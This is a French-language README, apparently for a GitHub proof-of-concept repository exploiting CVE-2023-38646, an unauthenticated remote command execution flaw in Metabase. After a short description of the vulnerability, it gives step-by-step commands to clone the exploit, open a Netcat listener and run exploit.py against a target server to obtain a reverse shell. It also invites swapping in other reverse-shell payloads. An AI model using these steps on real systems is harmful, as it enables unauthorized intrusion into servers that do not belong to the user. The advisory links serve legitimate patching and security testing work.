
Ceci est un script de preuve de concept (PoC) pour exploiter Metabase, un outil open-source de business intelligence et d'analyse de données.
Ceci est un script de preuve de concept (PoC) pour exploiter Metabase, un outil open-source de business intelligence et d'analyse de données. Metabase permet aux utilisateurs de visualiser et d'interagir avec leurs données, ce qui en fait une plateforme puissante pour l'analyse de données.
Cette vulnérabilité, désignée sous le nom de CVE-2023-38646, permettait aux attaquants d'exécuter des commandes arbitraires sur le serveur sans nécessiter d'authentification. L'impact de cette faille était grave, car elle accordait un accès non autorisé au serveur au niveau de privilège du serveur.
Clonez ce dépôt
git clone https://github.com/threatHNTR/CVE-2023-38646.git
Accédez au dépôt
cd CVE-2023-38646
Avant d'exécuter le script, configurez un écouteur Netcat
nc -nlvp port-choisi
Exécutez le script
python3 exploit.py -u http://serveur-metabase-cible -i votre-adresse-ip -p port-choisi
Exploitation : Le script tentera d'envoyer un reverse shell au serveur Metabase cible. En cas de succès, vous recevrez un shell sur votre machine. N'hésitez pas à modifier le payload pour essayer différents reverse shells.
Avis GitHub : https://github.com/advisories/GHSA-jg32-8h6w-x7vg
Avis Metabase : https://www.metabase.com/blog/security-advisory
GitHub Metabase : https://github.com/metabase/metabase
Blog Assetnote – Enchaîner pour une RCE pré-authentification dans Metabase : https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/